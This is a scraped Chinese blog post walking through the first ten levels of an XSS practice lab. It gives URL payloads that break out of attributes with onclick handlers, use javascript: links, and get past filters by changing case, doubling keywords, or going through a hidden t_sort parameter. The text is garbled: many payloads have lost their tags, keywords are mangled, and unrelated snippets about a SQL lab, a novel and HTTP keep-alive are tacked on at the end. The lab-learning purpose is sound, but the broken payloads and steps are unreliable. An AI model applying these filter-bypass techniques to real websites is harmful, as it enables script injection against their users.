xss lab 目前是1 10關

2022-10-04 03:18:10 字數 1960 閱讀 5623

靶機:

第一關

playboard構造:直接在?name=

輸入?keyword=&submit=搜尋

檢視原始碼:

注釋掉後面的》,jsp中注釋符為//,閉合前面的

構造playboad?keyword=">//&submit=搜尋

輸入測試:?keyword=">//&submit=搜尋

發現原始碼

發現後台對<>進行了轉義,所以棄用<>標籤,而onclick按鈕可用於html元素中,點選後可觸發相關jsp**

?keyword=' onclick='alert(1)&submit=搜尋

閉合單引號 點選框就行

測試?keyword=">&submit=搜尋 

檢視原始碼

發現過濾<>

嘗試使用上關playload 發現單引號有些不對修改

playload:?keyword=" onclick="alert(1)&submit=搜尋

測試:發現原始碼變為:

可知其改變了script標籤,但沒有改變<>,測試onclick標籤也有類似情況,所以上偽協議

playload:?keyword=">,&submit=搜尋

測試時發現a、sciipt、oncick標籤均過濾了,嘗試用大小寫繞過,成功

playload:?keyword=">//&submit=搜尋

測試後發現scipt與href被過濾,還有on,且大小寫繞過無效,嘗試雙繞過發現可以

playload:?keyword=">alert(1)&submit=搜尋

檢視原始碼後,發現這個是輸入後構造到a標籤中 那麼用偽協議 發現j**ascript被轉義為j**ascri_pt

字元實體是用乙個編號寫入html**中來代替乙個字元,在使用瀏覽器訪問網頁時會將這個編號解析還原為字元以供閱讀。

構造出的playload為:j**ascript:alert(1)

發現原始碼中顯示:

當新增buuctf位址 發現依然顯示不合法,那麼這個a標籤是通過一些特徵碼去檢視,而非查詢後返回

嘗試用http://發現合法,而https://不合法,不合法無法正常構造

構造出的playload為:j**ascript:alert('http://')

發現源**中存在三個hidden屬性的值

嘗試對三個屬性傳不同的引數,發現只有t_sort引數回顯到html上,可以確定是他

構造playload:?keyword=&t_sort=" type="text" οnclick="alert(1)

sql lab 1 10關通關秘籍

前言 剛開始接觸sql lab闖關,就感覺特別懵,不知道從哪下手,後來在網上找了一些大佬的經驗與解析,慢慢的學會了怎麼解析,以下解析只是個人見解,可能有些錯誤,大佬勿噴。寫在前面 1.information schema 為自帶資料庫 table schema資料庫名 table name 資料表名...

人生最難是情關

西遊記有九九八十一難,八十難都留給了猴子,但唯獨女兒國這一難給了唐僧 小時候看西遊記,覺得女兒國好無聊,這一 劫 過 的 好 簡 單,什 麼 妖怪 都沒有就這麼過去了,長大後才知道這一劫過得撕心裂肺。小時候以為唐僧躲過了一劫,長大了才知道原來女兒國是最難渡的情劫,生劫易渡,情劫難了,唐僧錯過了一 唐...

HTTP的KeepAlive是開啟還是關閉?

http的keepalive是開啟還是關閉?1 keepalive的概念與優勢 http的keepalive就是瀏覽器和服務端之間保持長連線,這個連線是可以復用的。當客戶端傳送一次請求,收到相應內容後,這個連線會保持一段時間,在該時間內的第二次就不需要再重新建立連線,就可以直接使用這次的連線來傳送請...